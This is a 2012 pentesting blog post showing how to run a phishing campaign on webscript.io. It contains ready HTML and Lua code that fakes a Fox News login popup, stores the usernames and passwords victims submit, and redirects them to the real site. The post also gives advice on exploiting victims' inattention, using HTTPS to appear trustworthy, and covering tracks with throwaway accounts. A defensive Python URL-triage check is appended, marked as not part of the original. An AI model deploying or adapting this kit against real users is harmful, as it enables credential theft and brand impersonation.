AverageSecurityGuy

Security, Programming, Pentesting

5 November 2012

Phishing with Webscript.io

by averagesecurityguy

One of the guys on the Chugalug mailing list mentioned webscript.io on Saturday night and it immediately sounded interesting. The basic concept is that you choose a webscript.io subdomain, write a few Lua scripts, and you have a web service up and running. The web service can run under HTTP or HTTPS. One of the other guys on the list was equally impressed but wondered what you would do with it. My first thought was phishing. So, I reworked a phishing setup I did a while back and made it work for webscript.io.

I set up an account with webscript.io (you only need an email address to do this) and created two scripts.

foxnews.webscript.io/login

return [[

<!-- Add the background to give the popup effect -->
<div id="bg" style="background-color: #111111; opacity: 0.65; 
filter: alpha(opacity=65); position: absolute; z-index: 9000; 
top: 0px; left: 0px; width: 100%; height: 2000px;"></div>

<!-- Create the login box -->
<div id="login" style="padding: 16px; position: absolute; 
top: 40px; left: 40px; background-color: #eeeeee; width: 300px; 
z-index: 10000; text-align: left; border: 2px solid #000000;">
<p>Login to the Fox News web site.</p>

<form action="http://foxnews.webscript.io/data" method="POST">
<table border="0" cellpadding="1" cellspacing="1">

<tr><td>Username: </td>
<td><input type="text" name="username" /></td></tr>
<tr><td>Password: </td>
<td><input type="password" name="password" /></td></tr>
<tr><td colspan="2">
<input type="submit" value="Login" /></td></tr>
</table>
</form>
</div>]], {["Content-Type"]="text/html"}

foxnews.webscript.io/data

storage[request.form.username] = request.form.password 
return 302, '', {
	Location ='http://www.foxnews.com'
}

The first script builds a page with an iframe and a "popup" login box. You can modify the HTML to use any target site that allows itself to be framed, or you could use a screenshot of the target as a background. When the username and password are submitted, webscript.io stores them for you and displays them on your management page when you log in.

One problem with using webscript.io is that you can't choose your own domain name, but truthfully, phishing victims are not known for paying attention to details. You can also mitigate this problem by using HTTPS, because most users don't think past getting the green "secure" web site indicator.

One big benefit is that webscript.io automatically deletes your scripts after 7 days. So, you could set up an account with a throw-away email address, run your campaign, and walk away. Webscript.io will clean it all up for you. Also, looking through the examples, it looks like you can send emails through them as well. It's a one-stop phishing shop. :)
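From the defender's side, the two traits described above (a brand name used as a subdomain of a hosting service, and a password form that posts to that host) are both checkable when triaging a reported URL. The following is an added example, not code from the original post: the `BRANDS` allow-list, the function names and the sample markup are assumptions made for illustration, and the registrable-domain rule is a naive last-two-labels approximation.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumed allow-list: brand label -> that brand's real registrable domain.
BRANDS = {"foxnews": "foxnews.com"}
# Constructed sample modelled on the form markup shown in the post.
SAMPLE = ('<form action="http://foxnews.webscript.io/data" method="POST">'
          '<input type="text" name="username" />'
          '<input type="password" name="password" /></form>')

class FormScan(HTMLParser):
    """Collect form actions and note whether a password field is present."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

def registrable(host):
    # Naive last-two-labels rule; production code should use the Public Suffix List.
    return ".".join(host.lower().rstrip(".").split(".")[-2:])

def brand_mismatch(host):
    """Return the brand whose name is a hostname label outside its own domain."""
    labels = host.lower().rstrip(".").split(".")
    for brand, real in BRANDS.items():
        if brand in labels[:-2] and registrable(host) != real:
            return brand
    return None

def triage(url, html):
    """Return a list of findings for one fetched page."""
    host = urlparse(url).hostname or ""
    scan = FormScan()
    scan.feed(html)
    findings = []
    brand = brand_mismatch(host)
    if brand:
        findings.append(f"brand label '{brand}' on {registrable(host)}")
    if scan.has_password:
        findings.append("password field present")
        if any(urlparse(urljoin(url, a)).scheme == "http" for a in scan.actions):
            findings.append("form posts over plaintext HTTP")
    return findings
```

A valid HTTPS certificate on the page changes none of these findings, which is why the check looks at the hostname and the form rather than the padlock.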
